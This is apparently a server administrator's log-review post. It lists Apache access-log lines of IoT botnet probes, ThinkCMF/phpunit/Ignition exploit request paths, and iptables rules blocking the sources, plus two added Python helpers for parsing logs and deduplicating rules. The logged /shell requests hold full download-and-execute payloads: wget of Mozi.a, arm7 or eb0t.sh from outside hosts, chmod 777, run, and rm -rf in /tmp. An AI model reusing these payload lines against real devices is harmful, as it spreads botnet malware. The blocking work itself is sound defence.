List of IPs carrying out GET /shell type attacks

Here is the list:

61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
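The log lines above are in Apache "combined" format, so the client IP is the first field and the request line is the first quoted field. The following is an added example (not code from the original post): a small parser that extracts the attacking client addresses for a given request signature, counts them the way the zgrep/awk pipeline used later in this post does, and emits the matching iptables DROP rules while skipping any address already covered by an existing rule or network. The function names, the signature regexes and the sample log (RFC 5737 documentation addresses plus one constructed address inside the post's 61.40.0.0/16 block) are assumptions; nothing here comes from the post's own logs.

```python
"""Extract attacking client IPs from Apache combined-format access logs and
turn them into iptables DROP rules.  Added example, not from the original post."""
import ipaddress
import re
from collections import Counter

# Apache "combined" LogFormat:
#   client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Request-line signatures for the three attack types discussed in the post
# (the names and patterns are this example's assumptions).
SIGNATURES = {
    "shell": re.compile(r"^GET /shell\?"),
    "hnap1": re.compile(r"/HNAP1"),
    "thinkcmf": re.compile(r"HelloThinkCMF"),
}

# Constructed sample log: documentation-range addresses (RFC 5737), one made-up
# address inside 61.40.0.0/16, shortened request payloads and one junk line.
SAMPLE_LOG = """\
203.0.113.10 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;wget+http://203.0.113.10/x HTTP/1.1" 404 490 "-" "Hello, world"
198.51.100.7 - - [31/May/2021:06:52:00 +0200] "GET /HNAP1/ HTTP/1.1" 404 0 "-" "-"
203.0.113.10 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;wget+http://192.0.2.44/arm7 HTTP/1.1" 400 0 "-" "Pe7kata"
192.0.2.200 - - [21/May/2021:04:07:59 +0200] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
61.40.12.34 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp HTTP/1.1" 400 0 "-" "-"
198.51.100.7 - - [28/May/2021:20:03:35 +0200] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 0 "-" "-"
not a log line at all
"""


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def count_attackers(log_text, signature):
    """Count client IPs whose request line matches `signature` (a compiled regex).
    Lines that do not parse are ignored rather than crashing the run."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and signature.search(rec["request"]):
            hits[rec["ip"]] += 1
    return hits


def drop_rules(hits, existing_networks=()):
    """Build 'iptables -A INPUT -s <ip> -j DROP' lines for each attacking IP, in address
    order, skipping any address that an existing rule (a /32 or a wider CIDR) already covers."""
    covered = [ipaddress.ip_network(n) for n in existing_networks]
    rules = []
    for ip in sorted(hits, key=ipaddress.ip_address):
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in covered):
            continue  # already dropped by a rule in rules.v4, no duplicate needed
        rules.append(f"iptables -A INPUT -s {addr} -j DROP")
    return rules


if __name__ == "__main__":
    for name, sig in SIGNATURES.items():
        hits = count_attackers(SAMPLE_LOG, sig)
        print(f"# {name}: {sum(hits.values())} request(s) from {len(hits)} address(es)")
        for ip, n in hits.most_common():  # same shape as 'sort | uniq -c'
            print(f"{n:7d} {ip}")
        for rule in drop_rules(hits, existing_networks=["61.40.0.0/16"]):
            print(rule)
```

Point `count_attackers` at the decompressed contents of the rotated access logs (or at `zcat` output) to get the same counts as the post's `zgrep | sed | awk | sort | uniq -c` pipeline; the `existing_networks` argument is what keeps the address list from growing with duplicates each time the logs are re-scanned.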

Note that IP 45.14.149.244 is in Romania and 27.45.11.127 is in China.

Summary:

iptables -A INPUT -s 45.14.149.244 -j DROP
iptables -A INPUT -s 209.141.33.232 -j DROP
iptables -A INPUT -s 68.150.109.112 -j DROP
iptables -A INPUT -s 114.33.156.230 -j DROP
iptables -A INPUT -s 59.63.206.200 -j DROP
iptables -A INPUT -s 59.97.193.131 -j DROP
iptables -A INPUT -s 117.241.51.177 -j DROP
iptables -A INPUT -s 119.123.236.177 -j DROP
iptables -A INPUT -s 27.5.37.175 -j DROP
iptables -A INPUT -s 27.45.11.127 -j DROP
iptables -A INPUT -s 61.242.40.137 -j DROP
iptables -A INPUT -s 182.121.231.1 -j DROP
iptables-save > /etc/iptables/rules.v4

What a mess.

List of IPs carrying out HNAP1 type attacks: Linksys router vulnerability

Here is the list:

# zgrep "HNAP1" /var/log/apache2/access.*.log.*.gz | sed 's/:/ /g' | awk '{print $2}' | sort -n | uniq -c
      2 45.15.18.3
      1 49.143.32.6
      2 84.17.42.11
      1 101.0.54.165
      1 113.220.18.13
      2 151.106.8.41
      1 182.119.98.177
      1 103.91.80.2 --> India

Action: block these IPs:

iptables -A INPUT -s 45.15.18.3 -j DROP
iptables -A INPUT -s 49.143.32.6 -j DROP
iptables -A INPUT -s 84.17.42.11 -j DROP
iptables -A INPUT -s 101.0.54.165 -j DROP
iptables -A INPUT -s 113.220.18.13 -j DROP
iptables -A INPUT -s 151.106.8.41 -j DROP
iptables -A INPUT -s 182.119.98.177 -j DROP
iptables -A INPUT -s 103.91.80.2 -j DROP
iptables-save > /etc/iptables/rules.v4

Note that 84.17.42.11 is in France ....

What a mess.

Attack from IP 45.146.164.125: HelloThinkCMF (Russia) => Blocking the IP on all servers

Yet another attack from Russia; I should block all Russian IPs ....

Attack type:

GET /?XDEBUG_SESSION_START=phpstorm
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
GET /wp-content/plugins/wp-file-manager/readme.txt
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /_ignition/execute-solution HTTP/1.1"
GET /solr/admin/info/system?wt=json HTTP/1.1
GET /console/ HTTP/1.1
POST /api/jsonws/invoke HTTP/1.1
GET /index.php?r=user%2Fauth%2Flogin HTTP/1.1

When I search, it is not the only IP:

# zgrep "HelloThinkCMF" /var/log/apache2/access.humhub.log.*.gz | sed 's/:/ /g' | awk '{print $2}' | sort -n | uniq -c
     20 45.146.164.125
      2 45.146.164.131
      2 45.155.205.109
      4 45.155.205.181
      4 45.155.205.196
      1 123.58.4.233

Summary:

iptables -A INPUT -s 45.146.164.125 -j DROP
iptables -A INPUT -s 45.146.164.131 -j DROP
iptables -A INPUT -s 45.155.205.109 -j DROP
iptables -A INPUT -s 45.155.205.181 -j DROP
iptables -A INPUT -s 45.155.205.196 -j DROP
iptables -A INPUT -s 123.58.4.233 -j DROP
iptables-save > /etc/iptables/rules.v4

What a mess.

List of IPs filtered (DROP) on my servers

Here is the list (file /etc/iptables/rules.v4):

-A INPUT -s 112.126.90.41/32 -j DROP
-A INPUT -s 116.147.2.110/32 -j DROP
-A INPUT -s 122.14.209.13/32 -j DROP
-A INPUT -s 158.69.13.199/32 -j DROP
-A INPUT -s 193.112.88.67/32 -j DROP
-A INPUT -s 210.21.218.26/32 -j DROP
-A INPUT -s 223.75.249.2/32 -j DROP
-A INPUT -s 27.50.160.35/32 -j DROP
-A INPUT -s 49.233.63.234/32 -j DROP
-A INPUT -s 91.242.37.16/32 -j DROP
-A INPUT -s 103.87.167.253/32 -j DROP
-A INPUT -s 113.160.229.252/32 -j DROP
-A INPUT -s 123.201.235.83/32 -j DROP
-A INPUT -s 156.221.147.68/32 -j DROP
-A INPUT -s 171.236.213.49/32 -j DROP
-A INPUT -s 176.240.226.165/32 -j DROP
-A INPUT -s 202.90.133.210/32 -j DROP
-A INPUT -s 216.104.201.88/32 -j DROP
-A INPUT -s 175.172.174.191/32 -j DROP
-A INPUT -s 123.132.65.176/32 -j DROP
-A INPUT -s 103.145.13.43/32 -j DROP
-A INPUT -s 175.21.153.128/32 -j DROP
-A INPUT -s 178.63.34.189/32 -j DROP
-A INPUT -s 74.120.14.36/32 -j DROP
-A INPUT -s 34.240.212.8/32 -j DROP
-A INPUT -s 167.248.133.52/32 -j DROP
-A INPUT -s 162.142.125.52/32 -j DROP
-A INPUT -s 197.53.220.102/32 -j DROP
-A INPUT -s 134.209.87.169/32 -j DROP
-A INPUT -s 66.151.211.226/32 -j DROP
-A INPUT -s 61.40.0.0/16 -j DROP
-A INPUT -s 66.210.251.136/32 -j DROP
-A INPUT -s 202.215.160.75/32 -j DROP
-A INPUT -s 81.68.159.121/32 -j DROP
-A INPUT -s 178.129.246.3/32 -j DROP
-A INPUT -s 46.209.56.107/32 -j DROP
-A INPUT -s 156.197.215.223/32 -j DROP
-A INPUT -s 156.216.50.199/32 -j DROP
-A INPUT -s 192.241.224.104/32 -j DROP
-A INPUT -s 192.241.206.242/32 -j DROP
-A INPUT -s 216.245.193.22/32 -j DROP
-A INPUT -s 36.27.208.157/32 -j DROP
-A INPUT -s 81.68.106.157/32 -j DROP
-A INPUT -s 143.110.212.186/32 -j DROP
-A INPUT -s 54.39.22.135/32 -j DROP
-A INPUT -s 62.171.179.56/32 -j DROP
-A INPUT -s 93.113.111.100/32 -j DROP
-A INPUT -s 103.241.205.1/32 -j DROP
-A INPUT -s 128.199.122.54/32 -j DROP
-A INPUT -s 139.162.7.223/32 -j DROP
-A INPUT -s 139.59.58.116/32 -j DROP
-A INPUT -s 159.89.109.162/32 -j DROP
-A INPUT -s 201.143.63.92/32 -j DROP
-A INPUT -s 202.169.26.237/32 -j DROP
-A INPUT -s 206.189.93.93/32 -j DROP
-A INPUT -s 211.43.12.188/32 -j DROP
-A INPUT -s 123.172.67.122/32 -j DROP
-A INPUT -s 3.8.12.221/32 -j DROP
-A INPUT -s 34.237.4.205/32 -j DROP
-A INPUT -s 34.230.156.67/32 -j DROP
-A INPUT -s 3.142.196.207/32 -j DROP
-A INPUT -s 185.246.209.147/32 -j DROP
-A INPUT -s 18.231.94.162/32 -j DROP
-A INPUT -s 173.212.219.223/32 -j DROP
-A INPUT -s 139.224.198.47/32 -j DROP
-A INPUT -s 13.232.100.135/32 -j DROP
-A INPUT -s 125.64.94.221/32 -j DROP
-A INPUT -s 121.5.250.245/32 -j DROP
-A INPUT -s 114.70.235.43/32 -j DROP
-A INPUT -s 101.255.122.146/32 -j DROP
-A INPUT -s 5.188.210.227/32 -j DROP
-A INPUT -s 37.49.229.222/32 -j DROP
-A INPUT -s 34.237.4.205/32 -j DROP
-A INPUT -s 193.46.255.92/32 -j DROP
-A INPUT -s 165.227.84.219/32 -j DROP
-A INPUT -s 165.22.232.189/32 -j DROP
-A INPUT -s 5.8.10.202/32 -j DROP
-A INPUT -s 5.188.210.227/32 -j DROP
-A INPUT -s 222.77.181.28/32 -j DROP
-A INPUT -s 125.64.94.221/32 -j DROP
-A INPUT -s 108.168.131.251/32 -j DROP
-A INPUT -s 79.143.86.189/32 -j DROP
COMMIT
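A rules.v4 that is appended to by hand after every log review tends to accumulate the same address twice (as several /32 entries above do) and /32 entries that a wider block such as 61.40.0.0/16 already covers. The following is an added example, not code from the original post, that audits an iptables-save file for exactly those two problems and writes a cleaned copy; the rule regex, the function names and the sample file (the post's duplicated /32 entries and its /16, plus a made-up 61.40.77.1 inside that /16) are assumptions.

```python
"""Audit an iptables-save file (rules.v4) for duplicate and shadowed DROP rules.
Added example, not from the original post."""
import ipaddress
import re

# One '-A INPUT -s <net> -j DROP' line as iptables-save writes it (assumed layout).
RULE_RE = re.compile(r"^-A INPUT -s (?P<net>\S+) -j DROP$")

# Constructed sample in iptables-save format: the duplicated /32 entries mirror the
# post's rules.v4, 61.40.77.1 is a made-up address inside the post's 61.40.0.0/16.
SAMPLE_RULES = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -s 61.40.0.0/16 -j DROP
-A INPUT -s 34.237.4.205/32 -j DROP
-A INPUT -s 61.40.77.1/32 -j DROP
-A INPUT -s 5.188.210.227/32 -j DROP
-A INPUT -s 34.237.4.205/32 -j DROP
-A INPUT -s 5.188.210.227/32 -j DROP
COMMIT
"""


def parse_rules(text):
    """Yield (line_number, ip_network) for every DROP rule line; other lines are skipped."""
    for lineno, line in enumerate(text.splitlines(), 1):
        m = RULE_RE.match(line.strip())
        if m:
            yield lineno, ipaddress.ip_network(m.group("net"), strict=False)


def find_duplicates(text):
    """Networks listed more than once, mapped to how many times they appear."""
    counts = {}
    for _, net in parse_rules(text):
        counts[str(net)] = counts.get(str(net), 0) + 1
    return {net: n for net, n in counts.items() if n > 1}


def _shadowed_by(net, all_nets):
    """Return a wider network in all_nets that strictly contains net, else None."""
    for other in all_nets:
        if other.version == net.version and other != net and net.subnet_of(other):
            return other
    return None


def find_shadowed(text):
    """(narrow, wider) pairs: rules that a wider rule in the same file already covers."""
    nets = [net for _, net in parse_rules(text)]
    return [(str(net), str(_shadowed_by(net, nets)))
            for net in nets if _shadowed_by(net, nets) is not None]


def dedupe(text):
    """Rewrite the file keeping the first occurrence of each DROP rule and dropping rules
    that a wider rule covers; *filter, chain policies and COMMIT are kept unchanged."""
    nets = [net for _, net in parse_rules(text)]
    emitted, kept = set(), []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            kept.append(line)
            continue
        net = ipaddress.ip_network(m.group("net"), strict=False)
        if net in emitted or _shadowed_by(net, nets) is not None:
            continue
        emitted.add(net)
        kept.append(line)
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    print("duplicates:", find_duplicates(SAMPLE_RULES))
    print("shadowed:  ", find_shadowed(SAMPLE_RULES))
    print(dedupe(SAMPLE_RULES))
```

Run `dedupe` over the real file and load the result with `iptables-restore` (after checking it with `iptables-restore --test`, which only parses the file) rather than editing the live ruleset line by line. Two caveats worth keeping in mind with this append-only approach: `iptables -A` adds the rule at the end of INPUT, so if an earlier rule already accepts the traffic (established connections, port 80/443) the new DROP never matches, which `iptables -L INPUT -n --line-numbers` makes visible; and once the list reaches hundreds of addresses, a single `ipset` hash set referenced by one rule is both faster to match and easier to maintain than one `-A INPUT` line per address.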